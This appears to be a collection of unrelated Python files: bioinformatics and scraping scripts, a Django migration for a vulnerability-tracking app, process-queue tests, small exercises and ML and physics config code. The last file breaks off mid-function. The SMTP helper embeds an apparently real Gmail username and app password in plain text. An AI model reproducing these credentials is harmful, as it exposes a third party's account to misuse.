    parser.add_argument('indir', help='Input directory')
    parser.add_argument('outdir', help='Output directory')
    parser.add_argument('-j', type=int, help='Number of jobs')
    args = parser.parse_args()
    indir = args.indir
    outdir = args.outdir
    if not os.path.exists(outdir):
        os.mkdir(outdir)
    if args.j:
        jobs = args.j
    else:
        jobs = 500
    file_counter = 1
    for f in glob.glob(indir + '/*.fa'):
        # First pass: count sequences so split_fasta can size its chunks.
        total_sequences = 0
        # NOTE(review): 'rU' mode and the print statements make this
        # Python 2 code; 'U' mode was removed in Python 3.11 — confirm
        # the target runtime.
        infile = open(f, 'rU')
        for line in infile:
            if line.startswith('>'):
                total_sequences += 1
        print total_sequences
        # Rewind for the second pass that actually writes the splits.
        infile.seek(0)
        file_counter = split_fasta(infile, outdir, jobs,
                                   total_sequences, file_counter)
        print file_counter
        infile.close()
# Script entry point.
if __name__ == "__main__":
    main()
|
# Generated by Django 2.2.5 on 2019-09-09 09:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the app: Finding, Host, Import, ProofOfConcept,
    Service, Tool and Task tables.

    Auto-generated by Django 2.2.5 on 2019-09-09.  Applied migrations must
    not be edited retroactively; create a new migration for schema changes.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Finding',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('description', models.TextField(null=True)),
                ('pluginID', models.IntegerField(null=True)),
                # NOTE(review): several 0/1 IntegerFields below ('checked',
                # 'running', 'completed', ...) look like booleans — confirm
                # whether BooleanField was avoided deliberately.
                ('checked', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='Host',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ip', models.CharField(max_length=30)),
                ('fqdn', models.CharField(max_length=255, null=True)),
                ('mac', models.CharField(max_length=30, null=True)),
                ('os', models.CharField(max_length=100, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Import',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=30)),
                ('timestamp', models.DateTimeField(auto_now_add=True)),
                ('running', models.IntegerField(default=0)),
                ('completed', models.IntegerField(default=0)),
            ],
        ),
        migrations.CreateModel(
            name='ProofOfConcept',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('info', models.CharField(max_length=30)),
                ('poc', models.TextField(blank=True, null=True)),
                ('imported', models.IntegerField(default=0)),
                ('finding', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.Finding')),
            ],
        ),
        migrations.CreateModel(
            name='Service',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('port', models.IntegerField(default=0)),
                ('protocol', models.CharField(max_length=10)),
                ('haspoc', models.IntegerField(default=0)),
                ('falsepositive', models.IntegerField(default=0)),
                # M2M through ProofOfConcept links services to findings.
                ('findings', models.ManyToManyField(through='api.ProofOfConcept', to='api.Finding')),
                ('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='services', to='api.Host')),
            ],
        ),
        migrations.CreateModel(
            name='Tool',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('commandstring', models.CharField(max_length=255)),
                ('expected_good', models.TextField(blank=True, null=True)),
                ('expected_bad', models.TextField(blank=True, null=True)),
                ('timeout', models.IntegerField(default=60)),
                ('threads', models.IntegerField(blank=True, default=5, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Task',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('starttime', models.DateTimeField(auto_now_add=True)),
                ('threads', models.IntegerField(default=5)),
                ('running', models.IntegerField(default=0)),
                ('completed', models.IntegerField(default=0)),
                ('errormessage', models.TextField(blank=True, null=True)),
                ('targets_completed', models.IntegerField(default=0)),
                ('services', models.ManyToManyField(to='api.Service')),
                ('tool', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Tool')),
            ],
        ),
        # Added after Service exists to break the circular reference.
        migrations.AddField(
            model_name='proofofconcept',
            name='service',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='api.Service'),
        ),
    ]
|
import time
import pytest
from test.helper import (
execute_add,
wait_for_process,
wait_for_processes,
command_factory,
)
@pytest.mark.parametrize('signal',
    ['sigint', 'SIGINT', 'int', 'INT', '2',
     'sigterm', 'SIGTERM', 'term', 'TERM', '15',
     'sigkill', 'SIGKILL', 'kill', 'KILL', '9']
)
def test_kill(daemon_setup, signal):
    """A kill with any accepted signal spelling fails the running process."""
    execute_add('sleep 60')
    command_factory('kill')({'signal': signal})
    result = wait_for_process(0)
    assert result['status'] == 'paused'
    assert result['data'][0]['status'] == 'failed'
@pytest.mark.parametrize('signal', ['sigterm', 'sigint', 'sigkill'])
def test_kill_all(daemon_setup, multiple_setup, signal):
    """Killing without keys terminates every running process."""
    # Three running processes plus one still waiting in the queue.
    multiple_setup(
        max_processes=3,
        processes=4,
        sleep_time=60,
    )
    command_factory('kill')({'signal': signal})
    state = wait_for_processes([0, 1, 2])
    assert state['status'] == 'paused'
    for key in (0, 1, 2):
        assert state['data'][key]['status'] == 'failed'
    assert state['data'][3]['status'] == 'queued'
@pytest.mark.parametrize('signal', ['sigterm', 'sigint', 'sigkill'])
def test_kill_multiple(daemon_setup, multiple_setup, signal):
    """Killing selected keys only fails those processes."""
    # Three running processes plus one queued.
    multiple_setup(
        max_processes=3,
        processes=4,
        sleep_time=60,
    )
    # Kill two of the three running processes and wait for them to settle.
    command_factory('kill')({'keys': [0, 2], 'signal': signal})
    state = wait_for_processes([0, 2])
    # Two entries failed; the untouched one and the follow-up keep running.
    assert state['status'] == 'running'
    expected = {0: 'failed', 1: 'running', 2: 'failed', 3: 'running'}
    for key, wanted in expected.items():
        assert state['data'][key]['status'] == wanted
def test_kill_single(daemon_setup):
    """A targeted sigkill fails exactly the addressed process."""
    # The "&&" forces the shell to keep a parent process around, which is
    # what the kill command has to walk through to find the children.
    execute_add('sleep 60 && ls')
    # Give the shell parent a moment to spawn its children.
    time.sleep(1)
    # Kill the children of the parent process.
    command_factory('kill')({'keys': [0], 'signal': 'sigkill'})
    command_factory('status')()
    result = wait_for_process(0)
    assert result['status'] == 'running'
    assert result['data'][0]['status'] == 'failed'
def test_kill_single_with_multiple_commands(daemon_setup):
    """The signal only reaches the shell's child processes."""
    # The second sleep spawns only after the first one is gone, which
    # proves the signal hit the children rather than the shell itself.
    execute_add('sleep 60 ; sleep 60')
    time.sleep(1)  # let the shell parent spawn its first child
    # Kill the children of the parent process.
    command_factory('kill')({'keys': [0], 'signal': 'sigkill'})
    time.sleep(1)  # let the shell reap the child and start the next one
    # The queue entry must still be running.
    result = command_factory('status')()
    assert result['status'] == 'running'
    assert result['data'][0]['status'] == 'running'
def test_kill_shell_of_single_with_multiple_commands(daemon_setup):
    """With 'all' set, the signal reaches the shell process itself."""
    # Two chained sleeps: if only the child died, the shell would start
    # the second one; killing the shell prevents that.
    execute_add('sleep 60 ; sleep 60')
    time.sleep(1)  # let the shell parent spawn its children
    # Kill the shell process as well as its child processes.
    command_factory('kill')({'keys': [0], 'signal': 'sigkill', 'all': True})
    # Wait for pueue to clean up the mess.
    result = wait_for_process(0)
    assert result['status'] == 'running'
    assert result['data'][0]['status'] == 'failed'
|
# This script re-crawls the restaurants that were scraped incorrectly during the first search pass.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import time
import urllib.request
from bs4 import BeautifulSoup
import urllib.parse
from selenium.webdriver.chrome.options import Options
# Shop names to look up and the address results collected for them.
list_shop = []
dict_data = dict()

# First input line: path of the file listing shop names (one per line).
ffile = input()
ffile = open(ffile, "r", encoding="utf8")
# Second input line: path of the output file (opened for appending).
sfile = input()
sfile = open(sfile, "a", encoding="utf8")

for line in ffile:
    # BUG FIX: the old code stripped "\n" and then immediately overwrote
    # the result by re-stripping only spaces from the raw line, so every
    # shop name kept its trailing newline.
    shop = line.strip("\n").strip(" ")
    list_shop.append(shop)
def Xclicker(button):
    """Wait for and click the element located by the given XPath."""
    driver.implicitly_wait(10)
    driver.find_element_by_xpath(button).click()
def idclicker(button):
    """Wait for and click the element located by the given CSS selector."""
    driver.implicitly_wait(10)
    driver.find_element_by_css_selector(button).click()
# Start crawling: query each shop on findbiz.nat.gov.tw and scrape its address.
for shop in list_shop:
    time.sleep(2)
    chrome_driver_path = r"C:\Users\mikes\Desktop\python\crawler.practice\chromedriver\chromedriver.exe"
    options = webdriver.ChromeOptions()
    options.add_argument("headless")
    driver = webdriver.Chrome(chrome_driver_path, options=options)
    url = "https://findbiz.nat.gov.tw/fts/query/QueryList/queryList.do"
    url = driver.get(url)
    # Tick the various search options.
    Xclicker(
        '/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[1]/div/div/div/input[1]')
    # Search by shop name.
    Xclicker(
        '/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[2]/div/div/div/input[5]')
    # Tick the "business" option.
    Xclicker(
        '/html/body/div[2]/form/div[1]/div[1]/div/div[4]/div[2]/div/div/div/input[1]')
    # Untick the "company" option.
    idclicker("#isAliveY")
    # Keep only currently registered shops.
    Xclicker('//*[@id="advSearchIsOff"]/a')
    # Advanced search: restrict the business category via the two dropdowns.
    Xclicker('//*[@id="roundedBox"]/div[1]/div/label[8]')
    Xclicker('//*[@id="busiItemMain"]')
    Xclicker('//*[@id="busiItemMain"]/option[7]')
    Xclicker('//*[@id="busiItemSub"]')
    Xclicker('//*[@id="busiItemSub"]/option[192]')
    keyword = driver.find_element_by_css_selector("#qryCond")
    driver.implicitly_wait(10)
    keyword.send_keys(shop)  # enter the shop name
    # idclicker("#qryBtn")  # start the query
    time.sleep(1)
    # Open the first result entry.
    driver.find_element_by_xpath(
        '/html/body/div[2]/form/div[3]/div/div/div/div/div[2]/div/div[1]/a').click()
    # Scrape the address: its table row varies between entries, so probe
    # rows 8-11 until one contains the city name ("Taichung City").
    addr = driver.find_element_by_xpath(
        '//*[@id="tabBusmContent"]/div/table/tbody/tr[8]/td[2]')
    if "臺中市" not in addr.text:
        addr = driver.find_element_by_xpath(
            '//*[@id="tabBusmContent"]/div/table/tbody/tr[9]/td[2]')
        if "臺中市" not in addr.text:
            addr = driver.find_element_by_xpath(
                '//*[@id="tabBusmContent"]/div/table/tbody/tr[10]/td[2]')
            if "臺中市" not in addr.text:
                addr = driver.find_element_by_xpath(
                    '//*[@id="tabBusmContent"]/div/table/tbody/tr[11]/td[2]')
    # Drop the trailing "e-map" link text.  NOTE(review): str.strip removes
    # a *set of characters*, not the substring — confirm this never eats
    # legitimate trailing address characters.
    addr = addr.text.strip(" 電子地圖")
    dict_data[shop] = addr
    sfile.writelines(shop+" ")
    sfile.writelines(addr+"\n")
    shop = shop.strip("\n")
    print(shop, addr)
    driver.close()
print(dict_data)
|
import smtplib
def sendemail(toaddr,fromaddr,fromname,subject,msg):
message = """\nFrom: {} {}
\nTo: {}
\nSubject: {}
\n{}
"""
messagetosend = message.format(
fromaddr,
fromname,
toaddr,
subject,
msg)
# Credentials (if needed)
username = 'kenielpeart784@gmail.com'
password = 'psewxinzxcasdsjn'
# The actual mail send
server = smtplib.SMTP('smtp.gmail.com:587')
server.starttls()
server.login(username, password)
server.sendmail(fromaddr, toaddr, messagetosend)
server.quit()
return
|
# 3.1.1 list
# 1. Print each sample value together with its type.
datalist = [
    1452, 11.23, 1 + 2j, True, 'w3source',
    (0, -1), [5, 12], {"class": 'v', "section": 'a'},
]
for item in datalist:
    print(item, ":", type(item))
# 3.1.2 Numberlist
# 2a. Print all values below 5.
lst = [1, -1, 2, 0, 5, 8, -13, 21, -34, 55, 87, 0]


def haib(values):
    """Print every element of *values* that is less than 5, one per line.

    (The parameter used to be named ``list``, shadowing the builtin.)
    """
    for value in values:
        if value < 5:
            print(value)


haib(lst)
lst = [1, -1, 2, 0, 5, 8, -13, 21, -34, 55, 87, 0]
list_moi = []


def haic(values):
    """Collect each element of *values* below 5 into the module-level
    ``list_moi`` and print the collected list.

    (The parameter used to be named ``list``, shadowing the builtin.
    NOTE(review): source indentation was lost; the print is assumed to
    run once after the loop — confirm against the original exercise.)
    """
    for value in values:
        if value < 5:
            list_moi.append(value)
    print(list_moi)


haic(lst)
# Leftover scratch assignments from the exercise session.
a = [2, 3 ,4]
b = 1
c = 1.5
# The two bare expressions below evaluate and discard their results.
# NOTE(review): they look like an accidental paste — confirm before removing.
list
68
|
from django.db import models
import os
class ComplexityPost(models.Model):
    """A submitted code/problem string and the complexity guessed for it."""
    post = models.CharField(max_length=25)
    guess = models.CharField(max_length=25)
    # Set once when the row is created.
    date = models.DateTimeField(auto_now_add=True)
class MastersPost(models.Model):
    """A submission of the a/b/k/i parameters, stored as short strings."""
    post_a = models.CharField(max_length=5)
    post_b = models.CharField(max_length=5)
    post_k = models.CharField(max_length=5)
    # NOTE(review): integer default on a CharField; Django coerces it to
    # '0' on save, but a string default would be cleaner — confirm.
    post_i = models.CharField(max_length=5, default=0)
    # Set once when the row is created.
    date = models.DateTimeField(auto_now_add=True)
class QuickSort:
    def quick_sort(self, arr):
        """
        Sort *arr* in place with quicksort and return it.

        :param arr: list[int]
        :return: list[int] (the same list, sorted ascending)

        Bug fixed: the previous partition never advanced its indices past
        elements equal to the pivot, so inputs with duplicates (e.g.
        [2, 2]) swapped forever; the XOR swap would also zero a slot if
        it were ever called with i == j.  Both replaced below.
        """
        if not arr or len(arr) <= 1:
            return arr

        def qs(a, lo, hi):
            # Hoare partition around the middle element; i and j always
            # advance after a swap, so duplicates cannot loop forever.
            if lo >= hi:
                return
            pivot = a[(lo + hi) // 2]
            i, j = lo, hi
            while i <= j:
                while a[i] < pivot:
                    i += 1
                while a[j] > pivot:
                    j -= 1
                if i <= j:
                    a[i], a[j] = a[j], a[i]  # tuple swap: safe when i == j
                    i += 1
                    j -= 1
            qs(a, lo, j)
            qs(a, i, hi)

        qs(arr, 0, len(arr) - 1)
        return arr
# Quick demonstration run.
sorter = QuickSort()
data = [7, 3, 9, 5, 4, 10, 1]
print(sorter.quick_sort(data))
|
def prime_num():
    """Read bounds l and r from stdin and print how many primes lie in [l, r].

    Prints "enter valid value" when the input cannot be parsed (the old
    bare ``except`` swallowed *every* error, hiding real bugs).
    """
    try:
        l = int(input())
        r = int(input())
    except (ValueError, EOFError):
        print("enter valid value")
        return
    count = 0
    # Trial division up to sqrt(num) instead of num (same results, faster).
    for num in range(max(l, 2), r + 1):
        if all(num % i for i in range(2, int(num ** 0.5) + 1)):
            count += 1
    print(count)
# Run interactively: reads the two bounds from stdin.
prime_num()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Adventure object
"""
from object import AdventureGameObject
class AdventureGameObjectAltar(AdventureGameObject):
    """The altar: scenery that can be inspected but not opened, kicked,
    moved, talked to or picked up."""

    def getName(self):
        """Return the display name of this object."""
        return "Altar"

    def check(self):
        """Describe the altar to the player."""
        print("\nYou see an altar with 3 inscriptions on it.")
        print("The inscriptions is the icons of a water drop, a leaf and a fire.")

    def open(self, openedByRoom):
        """Opening the altar is not possible."""
        print("\nYou can't open the altar.")

    def kick(self, kickedByRoom):
        """Kicking the altar is not possible."""
        print("\nYou can't kick the altar.")

    def move(self, movedByRoom):
        """Moving the altar is not possible."""
        print("\nYou can't move the altar.")

    def talk(self, talkedByRoom, phrase):
        """Talking to the altar is not possible."""
        print("\nYou can't talk to the altar.")

    def use(self, usedByRoom):
        """Using the altar has no effect here."""
        pass

    def canPickup(self):
        """The altar cannot be carried."""
        return False
|
import FWCore.ParameterSet.Config as cms
def customise_trackMon_IterativeTracking_2012(process):
    """Replace the per-step TrackMon modules with the combined
    trackMonIterativeTracking2012 monitor in every Tier0 DQM sequence."""
    from DQM.TrackingMonitor.TrackingMonitorSeedNumber_cff import trackMonIterativeTracking2012
    step_names = ["TrackMonStep%d" % k for k in (0, 1, 2, 3, 4, 5, 6, 9, 10)]
    for seq_name in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"]:
        seq = getattr(process, seq_name)
        # Remember where step 0 sat so the replacement lands in its slot.
        idx = seq.index(getattr(process, "TrackMonStep0"))
        for step in step_names:
            seq.remove(getattr(process, step))
        seq.insert(idx, getattr(process, "trackMonIterativeTracking2012"))
    return process
######### Phase1
def customise_trackMon_IterativeTracking_PHASE1(process):
    """Replace the per-step TrackMon modules with the combined Phase-I
    monitor in every Tier0 DQM sequence."""
    process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_PhaseI_cff")
    step_names = ["TrackMonStep%d" % k for k in (0, 1, 2, 3, 4, 5, 6, 9, 10)]
    for seq_name in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"]:
        seq = getattr(process, seq_name)
        # Remember where step 0 sat so the replacement lands in its slot.
        idx = seq.index(getattr(process, "TrackMonStep0"))
        for step in step_names:
            seq.remove(getattr(process, step))
        seq.insert(idx, getattr(process, "trackMonIterativeTrackingPhaseI"))
    return process
######## Phase1 PU70
def customise_trackMon_IterativeTracking_PHASE1PU70(process):
    """Swap per-step tracking monitors for the Phase-1 PU70 variant.

    Same procedure as the Phase-1 customisation: in each SiStrip Tier-0 DQM
    sequence, remove TrackMonStepN (steps 0-6, 9, 10) and insert
    ``trackMonIterativeTrackingPhase1PU70`` where step 0 used to be.

    Returns the (mutated) ``process``.
    """
    process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_Phase1PU70_cff")
    # One loop instead of nine copy-pasted remove() calls.
    step_names = ["TrackMonStep%d" % n for n in (0, 1, 2, 3, 4, 5, 6, 9, 10)]
    for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"]:
        seq = getattr(process, s)
        # Remember where step 0 sat so the replacement lands in the same slot.
        idx = seq.index(getattr(process, "TrackMonStep0"))
        for step in step_names:
            seq.remove(getattr(process, step))
        seq.insert(idx, getattr(process, "trackMonIterativeTrackingPhase1PU70"))
    return process
######## Phase1 PU140
def customise_trackMon_IterativeTracking_PHASE1PU140(process):
    """Swap per-step tracking monitors for the Phase-1 PU140 variant.

    Same procedure as the Phase-1 customisation: in each SiStrip Tier-0 DQM
    sequence, remove TrackMonStepN (steps 0-6, 9, 10) and insert
    ``trackMonIterativeTrackingPhase1PU140`` where step 0 used to be.

    Returns the (mutated) ``process``.
    """
    process.load("DQM.TrackingMonitor.TrackingMonitorSeedNumber_Phase1PU140_cff")
    # One loop instead of nine copy-pasted remove() calls.
    step_names = ["TrackMonStep%d" % n for n in (0, 1, 2, 3, 4, 5, 6, 9, 10)]
    for s in ["SiStripDQMTier0", "SiStripDQMTier0Common", "SiStripDQMTier0MinBias"]:
        seq = getattr(process, s)
        # Remember where step 0 sat so the replacement lands in the same slot.
        idx = seq.index(getattr(process, "TrackMonStep0"))
        for step in step_names:
            seq.remove(getattr(process, step))
        seq.insert(idx, getattr(process, "trackMonIterativeTrackingPhase1PU140"))
    return process
|
''' An example of training a reinforcement learning agent on the PettingZoo
environments that wrap RLCard
'''
import os
import argparse
import torch
from pettingzoo.classic import (
leduc_holdem_v4,
texas_holdem_v4,
texas_holdem_no_limit_v6,
gin_rummy_v4,
)
from rlcard.agents.pettingzoo_agents import RandomAgentPettingZoo
from rlcard.utils import (
get_device,
set_seed,
Logger,
plot_curve,
run_game_pettingzoo,
reorganize_pettingzoo,
tournament_pettingzoo,
)
# Maps the CLI --env name to the PettingZoo module whose .env() builds it.
# Only these four games have a PettingZoo/RLCard wrapper imported above.
env_name_to_env_func = {
    "leduc-holdem": leduc_holdem_v4,
    "limit-holdem": texas_holdem_v4,
    "no-limit-holdem": texas_holdem_no_limit_v6,
    "gin-rummy": gin_rummy_v4,
}
def train(args):
    """Train a DQN or NFSP agent against random opponents on a PettingZoo
    RLCard environment, periodically evaluate it, plot the learning curve
    and save the final model.

    args: argparse.Namespace with env, algorithm, seed, num_episodes,
    num_eval_games, evaluate_every and log_dir attributes (see CLI below).
    """
    # Check whether gpu is available
    device = get_device()
    # Seed numpy, torch, random
    set_seed(args.seed)
    # Make the environment with seed
    env_func = env_name_to_env_func[args.env]
    env = env_func.env()
    env.reset(seed=args.seed)
    # Initialize the agent and use random agents as opponents
    # The learning agent always takes the first seat.
    learning_agent_name = env.agents[0]
    if args.algorithm == 'dqn':
        from rlcard.agents.pettingzoo_agents import DQNAgentPettingZoo
        agent = DQNAgentPettingZoo(
            num_actions=env.action_space(learning_agent_name).n,
            state_shape=env.observation_space(learning_agent_name)["observation"].shape,
            mlp_layers=[64,64],
            device=device
        )
    elif args.algorithm == 'nfsp':
        from rlcard.agents.pettingzoo_agents import NFSPAgentPettingZoo
        agent = NFSPAgentPettingZoo(
            num_actions=env.action_space(learning_agent_name).n,
            state_shape=env.observation_space(learning_agent_name)["observation"].shape,
            hidden_layers_sizes=[64,64],
            q_mlp_layers=[64,64],
            device=device
        )
    # All other seats are filled with uniformly random agents.
    agents = {learning_agent_name: agent}
    for i in range(1, env.num_agents):
        agents[env.agents[i]] = RandomAgentPettingZoo(num_actions=env.action_space(env.agents[i]).n)
    # Start training
    num_timesteps = 0
    with Logger(args.log_dir) as logger:
        for episode in range(args.num_episodes):
            if args.algorithm == 'nfsp':
                agent.sample_episode_policy()
            # Generate data from the environment
            trajectories = run_game_pettingzoo(env, agents, is_training=True)
            trajectories = reorganize_pettingzoo(trajectories)
            num_timesteps += sum([len(t) for t in trajectories.values()])
            # Only the learning agent's transitions are fed to the learner.
            for ts in trajectories[learning_agent_name]:
                agent.feed(ts)
            # Evaluate the performance. Play with random agents.
            if episode % args.evaluate_every == 0:
                average_rewards = tournament_pettingzoo(env, agents, args.num_eval_games)
                logger.log_performance(episode, average_rewards[learning_agent_name])
        # Get the paths
        csv_path, fig_path = logger.csv_path, logger.fig_path
    # Plot the learning curve
    plot_curve(csv_path, fig_path, args.algorithm)
    # Save model
    save_path = os.path.join(args.log_dir, 'model.pth')
    torch.save(agent, save_path)
    print('Model saved in', save_path)
if __name__ == '__main__':
    parser = argparse.ArgumentParser("DQN/NFSP example in RLCard")
    parser.add_argument(
        '--env',
        type=str,
        default='leduc-holdem',
        # Fix: only offer environments actually registered above.  The old
        # hard-coded list also contained 'doudizhu', 'mahjong' and 'uno',
        # which have no entry in env_name_to_env_func and made train()
        # crash with a KeyError.  Deriving the choices from the dict keeps
        # the two in sync automatically.
        choices=list(env_name_to_env_func.keys()),
    )
    parser.add_argument(
        '--algorithm',
        type=str,
        default='dqn',
        choices=[
            'dqn',
            'nfsp',
        ],
    )
    parser.add_argument(
        '--cuda',
        type=str,
        default='',
    )
    parser.add_argument(
        '--seed',
        type=int,
        default=42,
    )
    parser.add_argument(
        '--num_episodes',
        type=int,
        default=5000,
    )
    parser.add_argument(
        '--num_eval_games',
        type=int,
        default=2000,
    )
    parser.add_argument(
        '--evaluate_every',
        type=int,
        default=100,
    )
    parser.add_argument(
        '--log_dir',
        type=str,
        default='experiments/leduc_holdem_dqn_result/',
    )
    args = parser.parse_args()
    # Restrict visible GPUs before any CUDA initialisation happens.
    os.environ["CUDA_VISIBLE_DEVICES"] = args.cuda
    train(args)
|
# for row in range(0,13):
# if row == 0:
# th = "x "
# for x in range(1,13):
# th+=str(x) +" "
# print th
# continue
# string = "" + str(row) + " "
# for colum in range(1,13):
# string += str(row*colum) + " "
# print string |
#!/usr/bin/env python3
import os
import sys
import warnings
import argparse
import numpy as np
import shutil
import json
import grid2op
from grid2op.Runner import Runner
from grid2op.Chronics import ChangeNothing
from grid2op.Agent import BaseAgent
from grid2op.Reward import BaseReward, RedispReward, L2RPNSandBoxScore
from grid2op.Action import TopologyAndDispatchAction
from grid2op.Episode import EpisodeReplay
from grid2op.dtypes import dt_int
# Verbose path/content dumps during development.
DEBUG = True # we'll change that for the real competition
# --- Message templates below are printed and/or raised as RuntimeError ---
SUBMISSION_DIR_ERR = """
ERROR: Impossible to find a "submission" package.
Agents should be included in a "submission" directory
A module with a function "make_agent" to load the agent that will be assessed."
"""
MAKE_AGENT_ERR = """
ERROR: We could NOT find a function name \"make_agent\"
in your \"submission\" package. "
We remind you that this function is mandatory and should have the signature:
make_agent(environment, path_agent) -> agent
- The "agent" is the agent that will be tested.
- The "environment" is a valid environment provided.
It will NOT be updated during the scoring (no data are fed to it).
- The "path_agent" is the path where your agent is located
"""
ENV_TEMPLATE_ERR = """
ERROR: There is no powergrid found for making the template environment.
Or creating the template environment failed.
The agent will not be created and this will fail.
"""
MAKE_AGENT_ERR2 = """
ERROR: "make_agent" is present in your package, but can NOT be used.
We remind you that this function is mandatory and should have the signature:
make_agent(environment, path_agent) -> agent
- The "agent" is the agent that will be tested.
- The "environment" is a valid environment provided.
It will NOT be updated during the scoring (no data are fed to it).
- The "path_agent" is the path where your agent is located
"""
BASEAGENT_ERR = """
ERROR: The "submitted_agent" provided should be a valid Agent.
It should be of class that inherit "grid2op.Agent.BaseAgent" base class
"""
INFO_CUSTOM_REWARD = """
INFO: No custom reward for the assessment of your agent will be used.
"""
REWARD_ERR = """
ERROR: The "training_reward" provided should be a class.
NOT a instance of a class
"""
REWARD_ERR2 = """
ERROR: The "training_reward" provided is invalid.
It should inherit the "grid2op.Reward.BaseReward" class
"""
INFO_CUSTOM_OTHER = """
INFO: No custom other_rewards for the assessment of your agent will be used.
"""
# Warning template used when the submission already defines the score key.
# NOTE(review): verify that main() references this constant by this exact
# name — the call site and the definition must agree.
KEY_OVERLOAD_REWARD = """
WARNING: You provided the key "{0}" in the "other_reward" dictionnary.
This will be replaced by the score of the competition, as stated in the rules. Your "{0}" key WILL BE erased by this operation.
"""
BACKEND_WARN = """
WARNING: Could not load lightsim2grid.LightSimBackend, falling back on PandaPowerBackend
"""
INFO_ENV_INGESTION_OK = """
Env {} ingestion data saved in : {}
"""
def cli():
    """Build and parse the command-line arguments of the ingestion program."""
    parser = argparse.ArgumentParser(description="Ingestion program")
    # Required paths.
    parser.add_argument("--input_path", required=True,
                        help="Path to the datasets folders")
    parser.add_argument("--output_path", required=True,
                        help="Path to the runner logs output dir")
    parser.add_argument("--program_path", required=True,
                        help="Path to the program dir")
    parser.add_argument("--submission_path", required=True,
                        help="Path to the submission dir")
    # Scoring options (defaults inlined rather than bound to locals).
    parser.add_argument("--key_score", required=False,
                        default="grid_operation_cost", type=str,
                        help="Codalab other_reward name")
    parser.add_argument("--nb_episode", required=False,
                        default=10, type=int,
                        help="Number of episodes in the dataset")
    parser.add_argument("--config_in", required=True,
                        help="Json config input file")
    # Optional GIF generation.
    parser.add_argument("--gif_env", required=False,
                        default=None, type=str,
                        help="Name of the environment to generate a gif for")
    parser.add_argument("--gif_episode", required=False,
                        default=None, type=str,
                        help="Name of the episode to generate a gif for")
    parser.add_argument("--gif_start", required=False,
                        default=0, type=int,
                        help="Start step for gif generation")
    parser.add_argument("--gif_end", required=False,
                        default=50, type=int,
                        help="End step for gif generation")
    # Post-run cleanup toggle.
    parser.add_argument("--cleanup", required=False,
                        default=False, action='store_true',
                        help="Cleanup runner logs")
    return parser.parse_args()
def write_gif(output_dir, agent_path, episode_name, start_step, end_step):
    """Render steps [start_step, end_step] of *episode_name* to a GIF and move
    it into *output_dir*.

    Best-effort: any failure is reported but never propagated, so GIF
    generation can never break the scoring run.
    """
    try:
        epr = EpisodeReplay(agent_path)
        epr.replay_episode(episode_name, fps=2.0,
                           load_info=None,
                           gen_info=None,
                           line_info=None,
                           display=False,
                           gif_name=episode_name,
                           start_step=start_step,
                           end_step=end_step)
        gif_genpath = os.path.join(agent_path, episode_name,
                                   episode_name + ".gif")
        gif_outpath = os.path.join(output_dir, episode_name + ".gif")
        print(gif_genpath, gif_outpath)
        if os.path.exists(gif_genpath):
            shutil.move(gif_genpath, gif_outpath)
    except Exception as exc:
        # Narrowed from a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit) and now reports the actual cause.
        print("Cannot create GIF export:", exc)
def main():
    """Entry point of the ingestion program.

    Loads the participant's "submission" package, builds every environment
    found under --input_path, runs the submitted agent with the Grid2Op
    Runner (fixed seeds), then optionally renders a GIF and cleans up the
    runner logs.

    Raises RuntimeError with a descriptive template whenever the submission
    does not satisfy the competition contract.
    """
    args = cli()
    # read arguments
    input_dir = args.input_path
    output_dir = args.output_path
    program_dir = args.program_path
    submission_dir = args.submission_path
    config_file = args.config_in
    with open(config_file, "r") as f:
        config = json.load(f)
    # Generate seeds once, so every environment is scored with the same ones.
    np.random.seed(int(config["score_config"]["seed"]))
    max_int = np.iinfo(dt_int).max
    env_seeds = list(np.random.randint(max_int, size=args.nb_episode))
    agent_seeds = list(np.random.randint(max_int, size=args.nb_episode))
    # create output dir if not existing
    if not os.path.exists(output_dir):
        os.makedirs(output_dir)
    if DEBUG:
        print("input dir: {}".format(input_dir))
        print("output dir: {}".format(output_dir))
        print("program dir: {}".format(program_dir))
        print("submission dir: {}".format(submission_dir))
        print("input content", os.listdir(input_dir))
        print("output content", os.listdir(output_dir))
        print("program content", os.listdir(program_dir))
        print("Content received by codalab: {}".format(sorted(os.listdir(submission_dir))))
    submission_location = os.path.join(submission_dir, "submission")
    if not os.path.exists(submission_location):
        print(SUBMISSION_DIR_ERR)
        raise RuntimeError(SUBMISSION_DIR_ERR)
    # add proper directories to path
    sys.path.append(program_dir)
    sys.path.append(submission_dir)
    try:
        from submission import make_agent
    except Exception as e:
        print(e)
